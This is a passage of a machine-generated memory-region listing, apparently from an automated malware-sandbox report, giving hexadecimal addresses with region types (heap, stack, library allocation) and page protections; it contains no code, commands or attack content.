page read and write
|
||
3ACA000
|
heap
|
page read and write
|
||
45F2000
|
heap
|
page read and write
|
||
51B8000
|
heap
|
page read and write
|
||
1D6C73BA000
|
heap
|
page read and write
|
||
1BF1C65D000
|
trusted library allocation
|
page read and write
|
||
4A75000
|
heap
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
17F5000
|
stack
|
page read and write
|
||
65F1000
|
heap
|
page read and write
|
||
1C8AEFAD000
|
trusted library allocation
|
page read and write
|
||
1BF2D7E5000
|
trusted library allocation
|
page read and write
|
||
1BF2DFC4000
|
trusted library allocation
|
page read and write
|
||
1BF1C833000
|
trusted library allocation
|
page read and write
|
||
22500357000
|
trusted library allocation
|
page read and write
|
||
3ABA000
|
heap
|
page read and write
|
||
2463B711000
|
trusted library allocation
|
page read and write
|
||
1C8ACCFA000
|
heap
|
page read and write
|
||
1BF34CCF000
|
heap
|
page read and write
|
||
6024000
|
heap
|
page read and write
|
||
1BF1C44C000
|
trusted library allocation
|
page read and write
|
||
2867CC00000
|
heap
|
page read and write
|
||
1BF1C675000
|
trusted library allocation
|
page read and write
|
||
22500037000
|
trusted library allocation
|
page read and write
|
||
28600347000
|
trusted library allocation
|
page read and write
|
||
E5144FE000
|
stack
|
page read and write
|
||
2750006F000
|
trusted library allocation
|
page read and write
|
||
1BF2C945000
|
trusted library allocation
|
page read and write
|
||
1BF1C3C6000
|
trusted library allocation
|
page read and write
|
||
28600095000
|
trusted library allocation
|
page read and write
|
||
28600339000
|
trusted library allocation
|
page read and write
|
||
7FFD9B92B000
|
trusted library allocation
|
page read and write
|
||
1BF1C416000
|
trusted library allocation
|
page read and write
|
||
1BF2C37D000
|
trusted library allocation
|
page read and write
|
||
635E000
|
heap
|
page read and write
|
||
1BF34EE9000
|
heap
|
page read and write
|
||
6C686000
|
unkown
|
page readonly
|
||
266D1790000
|
heap
|
page read and write
|
||
1BF2CFD6000
|
trusted library allocation
|
page read and write
|
||
6C657000
|
unkown
|
page readonly
|
||
1BF2D817000
|
trusted library allocation
|
page read and write
|
||
4A73000
|
heap
|
page read and write
|
||
6E509FE000
|
stack
|
page read and write
|
||
2250008B000
|
trusted library allocation
|
page read and write
|
||
22500089000
|
trusted library allocation
|
page read and write
|
||
665F000
|
heap
|
page read and write
|
||
225003A3000
|
trusted library allocation
|
page read and write
|
||
45E7000
|
heap
|
page read and write
|
||
15B558EA000
|
heap
|
page read and write
|
||
3A99000
|
heap
|
page read and write
|
||
452E000
|
heap
|
page read and write
|
||
1A99000
|
heap
|
page read and write
|
||
6C255000
|
unkown
|
page readonly
|
||
22500031000
|
trusted library allocation
|
page read and write
|
||
2463B9BF000
|
trusted library allocation
|
page read and write
|
||
1800000
|
heap
|
page read and write
|
||
148E65E0000
|
heap
|
page read and write
|
||
62B7000
|
heap
|
page read and write
|
||
6C831000
|
unkown
|
page read and write
|
||
2CB12B1A000
|
heap
|
page read and write
|
||
15B558E7000
|
heap
|
page read and write
|
||
6375000
|
heap
|
page read and write
|
||
1BF1C681000
|
trusted library allocation
|
page read and write
|
||
1BF1C7A5000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
1BF1C1E6000
|
trusted library allocation
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
24639C40000
|
heap
|
page read and write
|
||
3B2B000
|
heap
|
page read and write
|
||
6C786000
|
unkown
|
page readonly
|
||
1AD13380000
|
heap
|
page read and write
|
||
1BF2D7FF000
|
trusted library allocation
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
2860007B000
|
trusted library allocation
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
22500071000
|
trusted library allocation
|
page read and write
|
||
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
1BF2D8C2000
|
trusted library allocation
|
page read and write
|
||
3AC9000
|
heap
|
page read and write
|
||
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
51B9000
|
heap
|
page read and write
|
||
1BF1C34D000
|
trusted library allocation
|
page read and write
|
||
65FE000
|
heap
|
page read and write
|
||
94CB2FF000
|
stack
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
2463B9C9000
|
trusted library allocation
|
page read and write
|
||
2463B9DB000
|
trusted library allocation
|
page read and write
|
||
4BBD000
|
heap
|
page read and write
|
||
28115820000
|
heap
|
page read and write
|
||
523C000
|
heap
|
page read and write
|
||
4D99000
|
heap
|
page read and write
|
||
1C8AEB6D000
|
trusted library allocation
|
page read and write
|
||
5396000
|
heap
|
page read and write
|
||
27567ADC000
|
heap
|
page read and write
|
||
1BF1C3E4000
|
trusted library allocation
|
page read and write
|
||
527E000
|
heap
|
page read and write
|
||
3B49000
|
heap
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
49AB000
|
heap
|
page read and write
|
||
286003A5000
|
trusted library allocation
|
page read and write
|
||
1BF1C48C000
|
trusted library allocation
|
page read and write
|
||
24639D85000
|
heap
|
page read and write
|
||
7FFD9B7A4000
|
trusted library allocation
|
page read and write
|
||
1BF2C90F000
|
trusted library allocation
|
page read and write
|
||
5D15000
|
heap
|
page read and write
|
||
61E4000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
523D000
|
heap
|
page read and write
|
||
4BD2000
|
heap
|
page read and write
|
||
2463B689000
|
trusted library allocation
|
page read and write
|
||
6C78A000
|
unkown
|
page readonly
|
||
3B2B000
|
heap
|
page read and write
|
||
1BF2C852000
|
trusted library allocation
|
page read and write
|
||
1BF1C78E000
|
trusted library allocation
|
page read and write
|
||
2CB12C30000
|
heap
|
page read and write
|
||
6C1E5000
|
unkown
|
page readonly
|
||
27567BBB000
|
heap
|
page read and write
|
||
2750046D000
|
trusted library allocation
|
page read and write
|
||
4ADF000
|
heap
|
page read and write
|
||
4ADF000
|
heap
|
page read and write
|
||
5A53000
|
heap
|
page read and write
|
||
1BF1C492000
|
trusted library allocation
|
page read and write
|
||
4B17000
|
heap
|
page read and write
|
||
5494000
|
heap
|
page read and write
|
||
2250002D000
|
trusted library allocation
|
page read and write
|
||
1840000
|
heap
|
page read and write
|
||
5265000
|
heap
|
page read and write
|
||
6130000
|
heap
|
page read and write
|
||
2257901D000
|
heap
|
page read and write
|
||
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
1C8ACC30000
|
heap
|
page read and write
|
||
3AB9000
|
heap
|
page read and write
|
||
6C2E0000
|
unkown
|
page readonly
|
||
3A99000
|
heap
|
page read and write
|
||
475D000
|
heap
|
page read and write
|
||
48B6000
|
heap
|
page read and write
|
||
10A69CC000
|
stack
|
page read and write
|
||
1BF2D925000
|
trusted library allocation
|
page read and write
|
||
4AEE000
|
heap
|
page read and write
|
||
266D1540000
|
heap
|
page read and write
|
||
652F000
|
heap
|
page read and write
|
||
1BF34A00000
|
heap
|
page execute and read and write
|
||
4C62000
|
heap
|
page read and write
|
||
3DAC92C000
|
stack
|
page read and write
|
||
3A96000
|
heap
|
page read and write
|
||
22500467000
|
trusted library allocation
|
page read and write
|
||
2867C8A0000
|
heap
|
page read and write
|
||
1890000
|
heap
|
page read and write
|
||
2463BA63000
|
trusted library allocation
|
page read and write
|
||
1BF1C437000
|
trusted library allocation
|
page read and write
|
||
E5142FE000
|
stack
|
page read and write
|
||
148E4E10000
|
heap
|
page read and write
|
||
1BF1A6AD000
|
heap
|
page read and write
|
||
4BE3000
|
heap
|
page read and write
|
||
27567CB0000
|
heap
|
page read and write
|
||
27567BD0000
|
trusted library allocation
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
5269000
|
heap
|
page read and write
|
||
3A96000
|
heap
|
page read and write
|
||
24639A7A000
|
heap
|
page read and write
|
||
4C49000
|
heap
|
page read and write
|
||
28600344000
|
trusted library allocation
|
page read and write
|
||
22500351000
|
trusted library allocation
|
page read and write
|
||
4EE3000
|
heap
|
page read and write
|
||
EF1000
|
unkown
|
page execute read
|
||
4AFC000
|
heap
|
page read and write
|
||
1BF1C2AB000
|
trusted library allocation
|
page read and write
|
||
1A93000
|
heap
|
page read and write
|
||
3A8D000
|
heap
|
page read and write
|
||
22579265000
|
heap
|
page read and write
|
||
2463B693000
|
trusted library allocation
|
page read and write
|
||
27569F34000
|
heap
|
page read and write
|
||
94CB4FE000
|
stack
|
page read and write
|
||
4AEE000
|
heap
|
page read and write
|
||
6C26E000
|
unkown
|
page write copy
|
||
452E000
|
heap
|
page read and write
|
||
6260000
|
heap
|
page read and write
|
||
CCB92FF000
|
stack
|
page read and write
|
||
1D6C73AA000
|
heap
|
page read and write
|
||
22500009000
|
trusted library allocation
|
page read and write
|
||
BD949FB000
|
stack
|
page read and write
|
||
1AD1336B000
|
heap
|
page read and write
|
||
266D168F000
|
heap
|
page read and write
|
||
1C8AEEE1000
|
trusted library allocation
|
page read and write
|
||
1BF2DF90000
|
trusted library allocation
|
page read and write
|
||
22579180000
|
trusted library allocation
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
4E1C000
|
heap
|
page read and write
|
||
4B3F000
|
heap
|
page read and write
|
||
64E2000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
1BF2DF9E000
|
trusted library allocation
|
page read and write
|
||
1C8AEE7F000
|
trusted library allocation
|
page read and write
|
||
1BF34FAE000
|
heap
|
page read and write
|
||
632E000
|
heap
|
page read and write
|
||
1BF2D99A000
|
trusted library allocation
|
page read and write
|
||
1BF2D1E5000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
1BF2C870000
|
trusted library allocation
|
page read and write
|
||
6C1F1000
|
unkown
|
page execute read
|
||
266D15EE000
|
heap
|
page read and write
|
||
1C8AEFB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
1C8AEBCF000
|
trusted library allocation
|
page read and write
|
||
6C519000
|
unkown
|
page read and write
|
||
7FFD9B7CC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page execute and read and write
|
||
1BF2C237000
|
trusted library allocation
|
page read and write
|
||
4323000
|
heap
|
page read and write
|
||
5255000
|
heap
|
page read and write
|
||
225792F0000
|
heap
|
page read and write
|
||
49A1000
|
heap
|
page read and write
|
||
1BF1C2E1000
|
trusted library allocation
|
page read and write
|
||
94CB1FF000
|
stack
|
page read and write
|
||
1BF2D788000
|
trusted library allocation
|
page read and write
|
||
1BF1C1E9000
|
trusted library allocation
|
page read and write
|
||
266D1560000
|
heap
|
page read and write
|
||
1BF2D1BA000
|
trusted library allocation
|
page read and write
|
||
4FA8000
|
heap
|
page read and write
|
||
1BF1C261000
|
trusted library allocation
|
page read and write
|
||
C27D6FE000
|
stack
|
page read and write
|
||
1C8AEBC7000
|
trusted library allocation
|
page read and write
|
||
1C8AEBAF000
|
trusted library allocation
|
page read and write
|
||
11FA000
|
unkown
|
page write copy
|
||
BD945FD000
|
stack
|
page read and write
|
||
1BF2C8CF000
|
trusted library allocation
|
page read and write
|
||
2CB12B51000
|
heap
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
1BF1C29F000
|
trusted library allocation
|
page read and write
|
||
2463BA61000
|
trusted library allocation
|
page read and write
|
||
286003E1000
|
trusted library allocation
|
page read and write
|
||
3A8D000
|
heap
|
page read and write
|
||
6263000
|
heap
|
page read and write
|
||
28600470000
|
trusted library allocation
|
page read and write
|
||
1BF1C64B000
|
trusted library allocation
|
page read and write
|
||
1BF2D7B0000
|
trusted library allocation
|
page read and write
|
||
1BF2D79E000
|
trusted library allocation
|
page read and write
|
||
1B69000
|
heap
|
page read and write
|
||
45EE000
|
heap
|
page read and write
|
||
C27DAFD000
|
stack
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
50E1000
|
heap
|
page read and write
|
||
1A91000
|
heap
|
page read and write
|
||
1C8AEB77000
|
trusted library allocation
|
page read and write
|
||
22500353000
|
trusted library allocation
|
page read and write
|
||
49FE000
|
heap
|
page read and write
|
||
1A95000
|
heap
|
page read and write
|
||
1C8AEB41000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
3A91000
|
heap
|
page read and write
|
||
4B25000
|
heap
|
page read and write
|
||
54F8000
|
heap
|
page read and write
|
||
11FF000
|
unkown
|
page write copy
|
||
1D6C7360000
|
heap
|
page read and write
|
||
1BF1C444000
|
trusted library allocation
|
page read and write
|
||
1BF1A850000
|
heap
|
page read and write
|
||
1C8ACEB0000
|
trusted library allocation
|
page read and write
|
||
3A97000
|
heap
|
page read and write
|
||
1D75C50A000
|
heap
|
page read and write
|
||
4FEA000
|
heap
|
page read and write
|
||
148E6695000
|
heap
|
page read and write
|
||
1AD132A0000
|
heap
|
page read and write
|
||
2CB12B3B000
|
heap
|
page read and write
|
||
1BF1A9B5000
|
heap
|
page read and write
|
||
435C000
|
heap
|
page read and write
|
||
22500033000
|
trusted library allocation
|
page read and write
|
||
4527000
|
heap
|
page read and write
|
||
27500470000
|
trusted library allocation
|
page read and write
|
||
22500473000
|
trusted library allocation
|
page read and write
|
||
5302000
|
heap
|
page read and write
|
||
4A11000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
502C000
|
heap
|
page read and write
|
||
27EBF4F000
|
stack
|
page read and write
|
||
2CB12C50000
|
heap
|
page read and write
|
||
2860033F000
|
trusted library allocation
|
page read and write
|
||
3A8D000
|
heap
|
page read and write
|
||
BD958FD000
|
stack
|
page read and write
|
||
2250008F000
|
trusted library allocation
|
page read and write
|
||
24639EC0000
|
heap
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
225003A5000
|
trusted library allocation
|
page read and write
|
||
6C670000
|
unkown
|
page readonly
|
||
6C5ED000
|
unkown
|
page readonly
|
||
22500083000
|
trusted library allocation
|
page read and write
|
||
7FFD9B92B000
|
trusted library allocation
|
page read and write
|
||
4EE2000
|
heap
|
page read and write
|
||
1BF2C2EE000
|
trusted library allocation
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
2860047B000
|
trusted library allocation
|
page read and write
|
||
6399000
|
heap
|
page read and write
|
||
28600009000
|
trusted library allocation
|
page read and write
|
||
1D6C7460000
|
heap
|
page read and write
|
||
28610001000
|
trusted library allocation
|
page read and write
|
||
1AD13600000
|
heap
|
page read and write
|
||
225003ED000
|
trusted library allocation
|
page read and write
|
||
1BF2DFB0000
|
trusted library allocation
|
page read and write
|
||
28600083000
|
trusted library allocation
|
page read and write
|
||
27569F20000
|
heap
|
page read and write
|
||
2860046A000
|
trusted library allocation
|
page read and write
|
||
CF5BCFE000
|
stack
|
page read and write
|
||
E5147FE000
|
stack
|
page read and write
|
||
2463BAE7000
|
trusted library allocation
|
page read and write
|
||
1BF34CD1000
|
heap
|
page read and write
|
||
4AB0000
|
heap
|
page read and write
|
||
BD959F9000
|
stack
|
page read and write
|
||
1BF1C3CC000
|
trusted library allocation
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
3B04000
|
heap
|
page read and write
|
||
6375000
|
heap
|
page read and write
|
||
452B000
|
heap
|
page read and write
|
||
C27DEFA000
|
stack
|
page read and write
|
||
3AC0000
|
heap
|
page read and write
|
||
2257B630000
|
heap
|
page execute and read and write
|
||
1C8ACC70000
|
heap
|
page read and write
|
||
3B25000
|
heap
|
page read and write
|
||
638D000
|
heap
|
page read and write
|
||
4AD2000
|
heap
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
62F1000
|
heap
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
266D1626000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
2860008D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
1BF2C2E6000
|
trusted library allocation
|
page read and write
|
||
1BF1C3D7000
|
trusted library allocation
|
page read and write
|
||
1BF2D2A5000
|
trusted library allocation
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
7FFD9B909000
|
trusted library allocation
|
page read and write
|
||
1BF2D9DA000
|
trusted library allocation
|
page read and write
|
||
E5141FE000
|
stack
|
page read and write
|
||
27567890000
|
unkown
|
page readonly
|
||
266D314D000
|
trusted library allocation
|
page read and write
|
||
1BF1C5DA000
|
trusted library allocation
|
page read and write
|
||
1B58000
|
heap
|
page read and write
|
||
3A9B000
|
heap
|
page read and write
|
||
2463B9D1000
|
trusted library allocation
|
page read and write
|
||
6270000
|
heap
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
62AF000
|
heap
|
page read and write
|
||
4BE4000
|
heap
|
page read and write
|
||
1BF2C32E000
|
trusted library allocation
|
page read and write
|
||
2463B6F1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
1BF2C161000
|
trusted library allocation
|
page read and write
|
||
2463B6F7000
|
trusted library allocation
|
page read and write
|
||
27569F10000
|
heap
|
page read and write
|
||
1B5D000
|
heap
|
page read and write
|
||
1BF2D7A6000
|
trusted library allocation
|
page read and write
|
||
4ADF000
|
heap
|
page read and write
|
||
BD94BF7000
|
stack
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
1BF2D7E1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7AB000
|
trusted library allocation
|
page execute and read and write
|
||
2867EF70000
|
heap
|
page read and write
|
||
4AE7000
|
heap
|
page read and write
|
||
3ACA000
|
heap
|
page read and write
|
||
4E5E000
|
heap
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
2463B6AF000
|
trusted library allocation
|
page read and write
|
||
1C8AEB51000
|
trusted library allocation
|
page read and write
|
||
1BF2D1C5000
|
trusted library allocation
|
page read and write
|
||
1BF1A6F3000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
45F1000
|
heap
|
page read and write
|
||
1BF2D820000
|
trusted library allocation
|
page read and write
|
||
1BF2C39E000
|
trusted library allocation
|
page read and write
|
||
15B55820000
|
heap
|
page read and write
|
||
4A8F000
|
heap
|
page read and write
|
||
24639E90000
|
heap
|
page execute and read and write
|
||
5261000
|
heap
|
page read and write
|
||
27567940000
|
heap
|
page read and write
|
||
1D6C7220000
|
heap
|
page read and write
|
||
6C51E000
|
unkown
|
page readonly
|
||
94CB0FF000
|
stack
|
page read and write
|
||
2867F150000
|
heap
|
page execute and read and write
|
||
1D75C440000
|
heap
|
page read and write
|
||
27567890000
|
unkown
|
page readonly
|
||
55D8000
|
heap
|
page read and write
|
||
6E507FD000
|
stack
|
page read and write
|
||
D7986FB000
|
stack
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
2860046D000
|
trusted library allocation
|
page read and write
|
||
4AD2000
|
heap
|
page read and write
|
||
27500473000
|
trusted library allocation
|
page read and write
|
||
53F0000
|
heap
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
61F7000
|
heap
|
page read and write
|
||
225003A1000
|
trusted library allocation
|
page read and write
|
||
3A8D000
|
heap
|
page read and write
|
||
3ACA000
|
heap
|
page read and write
|
||
4363000
|
heap
|
page read and write
|
||
10A6DFF000
|
stack
|
page read and write
|
||
53F1000
|
heap
|
page read and write
|
||
1BF2CA05000
|
trusted library allocation
|
page read and write
|
||
22500087000
|
trusted library allocation
|
page read and write
|
||
65AC000
|
heap
|
page read and write
|
||
4AAA000
|
heap
|
page read and write
|
||
1BF2D1DA000
|
trusted library allocation
|
page read and write
|
||
1BF34F0D000
|
heap
|
page read and write
|
||
4B96000
|
heap
|
page read and write
|
||
1BF2C884000
|
trusted library allocation
|
page read and write
|
||
53A9000
|
heap
|
page read and write
|
||
28115630000
|
heap
|
page read and write
|
||
1C8AEE79000
|
trusted library allocation
|
page read and write
|
||
7FFD9B922000
|
trusted library allocation
|
page read and write
|
||
3AC0000
|
heap
|
page read and write
|
||
1BF1A680000
|
heap
|
page read and write
|
||
2463B6B1000
|
trusted library allocation
|
page read and write
|
||
52C0000
|
heap
|
page read and write
|
||
2250046A000
|
trusted library allocation
|
page read and write
|
||
1BF1C47B000
|
trusted library allocation
|
page read and write
|
||
2257B4D0000
|
heap
|
page read and write
|
||
1BF2D89A000
|
trusted library allocation
|
page read and write
|
||
4C49000
|
heap
|
page read and write
|
||
6203000
|
heap
|
page read and write
|
||
5EB3000
|
heap
|
page read and write
|
||
C116CFF000
|
stack
|
page read and write
|
||
6E508FE000
|
stack
|
page read and write
|
||
4FA8000
|
heap
|
page read and write
|
||
24639A7F000
|
heap
|
page read and write
|
||
45F2000
|
heap
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
22500077000
|
trusted library allocation
|
page read and write
|
||
1BF2C445000
|
trusted library allocation
|
page read and write
|
||
1BF35220000
|
heap
|
page read and write
|
||
626E000
|
heap
|
page read and write
|
||
24639C20000
|
heap
|
page read and write
|
||
266D15C8000
|
heap
|
page read and write
|
||
3A92000
|
heap
|
page read and write
|
||
1BF1A645000
|
heap
|
page read and write
|
||
1BF2C1ED000
|
trusted library allocation
|
page read and write
|
||
6E50BFE000
|
stack
|
page read and write
|
||
1C8AEE8D000
|
trusted library allocation
|
page read and write
|
||
266D359D000
|
trusted library allocation
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
3AC0000
|
heap
|
page read and write
|
||
4BE3000
|
heap
|
page read and write
|
||
4B3F000
|
heap
|
page read and write
|
||
4EA0000
|
heap
|
page read and write
|
||
4AEF000
|
heap
|
page read and write
|
||
1BF1A6ED000
|
heap
|
page read and write
|
||
3ACA000
|
heap
|
page read and write
|
||
2463B707000
|
trusted library allocation
|
page read and write
|
||
22579260000
|
heap
|
page read and write
|
||
3B04000
|
heap
|
page read and write
|
||
1C8AEE95000
|
trusted library allocation
|
page read and write
|
||
2463BA6D000
|
trusted library allocation
|
page read and write
|
||
4BE3000
|
heap
|
page read and write
|
||
2250035B000
|
trusted library allocation
|
page read and write
|
||
7FF42F7A0000
|
trusted library allocation
|
page execute and read and write
|
||
27567AD6000
|
heap
|
page read and write
|
||
48F8000
|
heap
|
page read and write
|
||
1BF34C54000
|
heap
|
page read and write
|
||
5432000
|
heap
|
page read and write
|
||
22500079000
|
trusted library allocation
|
page read and write
|
||
6C5EF000
|
unkown
|
page read and write
|
||
1BF353D0000
|
heap
|
page read and write
|
||
266E3121000
|
trusted library allocation
|
page read and write
|
||
12D8000
|
unkown
|
page read and write
|
||
1BF1C466000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
1BF2CFE0000
|
trusted library allocation
|
page read and write
|
||
6444000
|
heap
|
page read and write
|
||
44D4000
|
heap
|
page read and write
|
||
2867E6E0000
|
heap
|
page read and write
|
||
22500333000
|
trusted library allocation
|
page read and write
|
||
3A9E000
|
heap
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
28600351000
|
trusted library allocation
|
page read and write
|
||
6375000
|
heap
|
page read and write
|
||
1AD13500000
|
heap
|
page read and write
|
||
3AA2000
|
heap
|
page read and write
|
||
246541F0000
|
heap
|
page execute and read and write
|
||
1C8ACF30000
|
heap
|
page execute and read and write
|
||
1BF2CA1A000
|
trusted library allocation
|
page read and write
|
||
47F0000
|
heap
|
page read and write
|
||
4BD7000
|
heap
|
page read and write
|
||
1BF2C2C5000
|
trusted library allocation
|
page read and write
|
||
2867C90B000
|
heap
|
page read and write
|
||
1BF1C3F8000
|
trusted library allocation
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
2463BAFD000
|
trusted library allocation
|
page read and write
|
||
6C81F000
|
unkown
|
page read and write
|
||
1C8AEF88000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
1BF2D7A0000
|
trusted library allocation
|
page read and write
|
||
22578F50000
|
heap
|
page read and write
|
||
266D17E0000
|
heap
|
page read and write
|
||
3A99000
|
heap
|
page read and write
|
||
1C8ACC50000
|
heap
|
page read and write
|
||
5474000
|
heap
|
page read and write
|
||
94CB5FE000
|
stack
|
page read and write
|
||
1BF1A9B0000
|
heap
|
page read and write
|
||
2250047B000
|
trusted library allocation
|
page read and write
|
||
4CD2000
|
heap
|
page read and write
|
||
65E8000
|
heap
|
page read and write
|
||
4ABE000
|
heap
|
page read and write
|
||
2860002D000
|
trusted library allocation
|
page read and write
|
||
27567BBF000
|
heap
|
page read and write
|
||
E5146FE000
|
stack
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
28600087000
|
trusted library allocation
|
page read and write
|
||
4361000
|
heap
|
page read and write
|
||
1BF2C825000
|
trusted library allocation
|
page read and write
|
||
1BF1C420000
|
trusted library allocation
|
page read and write
|
||
7FFD9B919000
|
trusted library allocation
|
page read and write
|
||
3A99000
|
heap
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
C27D3ED000
|
stack
|
page read and write
|
||
2750049E000
|
trusted library allocation
|
page read and write
|
||
2867C91A000
|
heap
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
51E2000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
3AC0000
|
heap
|
page read and write
|
||
6C5E0000
|
unkown
|
page readonly
|
||
2463B9C7000
|
trusted library allocation
|
page read and write
|
||
506E000
|
heap
|
page read and write
|
||
C116BFE000
|
stack
|
page read and write
|
||
2463BAED000
|
trusted library allocation
|
page read and write
|
||
5681000
|
heap
|
page read and write
|
||
3B04000
|
heap
|
page read and write
|
||
1BF2D0D0000
|
trusted library allocation
|
page read and write
|
||
24639D80000
|
heap
|
page read and write
|
||
1BF1C4C2000
|
trusted library allocation
|
page read and write
|
||
22500091000
|
trusted library allocation
|
page read and write
|
||
28115905000
|
heap
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
2463B9B9000
|
trusted library allocation
|
page read and write
|
||
1D6C73BC000
|
heap
|
page read and write
|
||
1BF1C2B0000
|
trusted library allocation
|
page read and write
|
||
2860008B000
|
trusted library allocation
|
page read and write
|
||
24639C60000
|
heap
|
page read and write
|
||
22500349000
|
trusted library allocation
|
page read and write
|
||
266D3596000
|
trusted library allocation
|
page read and write
|
||
4DDA000
|
heap
|
page read and write
|
||
1BF2D827000
|
trusted library allocation
|
page read and write
|
||
3AC9000
|
heap
|
page read and write
|
||
1BF344EB000
|
heap
|
page read and write
|
||
C27E1FE000
|
stack
|
page read and write
|
||
E513CFE000
|
stack
|
page read and write
|
||
4A8F000
|
heap
|
page read and write
|
||
1BF1C48A000
|
trusted library allocation
|
page read and write
|
||
27567B3C000
|
heap
|
page read and write
|
||
1AD13381000
|
heap
|
page read and write
|
||
6C835000
|
unkown
|
page readonly
|
||
1BF2C91A000
|
trusted library allocation
|
page read and write
|
||
4B53000
|
heap
|
page read and write
|
||
50F2000
|
heap
|
page read and write
|
||
1BF1C67D000
|
trusted library allocation
|
page read and write
|
||
1BF1C6A9000
|
trusted library allocation
|
page read and write
|
||
1C8AEF21000
|
trusted library allocation
|
page read and write
|
||
1BF34C50000
|
heap
|
page read and write
|
||
27500476000
|
trusted library allocation
|
page read and write
|
||
24639CA0000
|
trusted library allocation
|
page read and write
|
||
27567AFB000
|
heap
|
page read and write
|
||
1BF2D9D0000
|
trusted library allocation
|
page read and write
|
||
28600357000
|
trusted library allocation
|
page read and write
|
||
2250046D000
|
trusted library allocation
|
page read and write
|
||
6E505FE000
|
stack
|
page read and write
|
||
6C267000
|
unkown
|
page read and write
|
||
1BF2C925000
|
trusted library allocation
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
22500339000
|
trusted library allocation
|
page read and write
|
||
2CB12B4D000
|
heap
|
page read and write
|
||
2463BA2D000
|
trusted library allocation
|
page read and write
|
||
1BF2C253000
|
trusted library allocation
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
28600001000
|
trusted library allocation
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
6578000
|
heap
|
page read and write
|
||
1BF2D9BA000
|
trusted library allocation
|
page read and write
|
||
266D16D0000
|
trusted library allocation
|
page read and write
|
||
18CE000
|
heap
|
page read and write
|
||
94CB6FF000
|
stack
|
page read and write
|
||
1C8ACCF5000
|
heap
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
EF0000
|
unkown
|
page readonly
|
||
4B5A000
|
heap
|
page read and write
|
||
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
1C8F000
|
stack
|
page read and write
|
||
C27E2FB000
|
stack
|
page read and write
|
||
28600035000
|
trusted library allocation
|
page read and write
|
||
3ABA000
|
heap
|
page read and write
|
||
3B04000
|
heap
|
page read and write
|
||
7FFD9B91B000
|
trusted library allocation
|
page read and write
|
||
1BF2D9C5000
|
trusted library allocation
|
page read and write
|
||
4EA1000
|
heap
|
page read and write
|
||
1BF2C2F5000
|
trusted library allocation
|
page read and write
|
||
266EB9D0000
|
heap
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
1BF1C3DD000
|
trusted library allocation
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
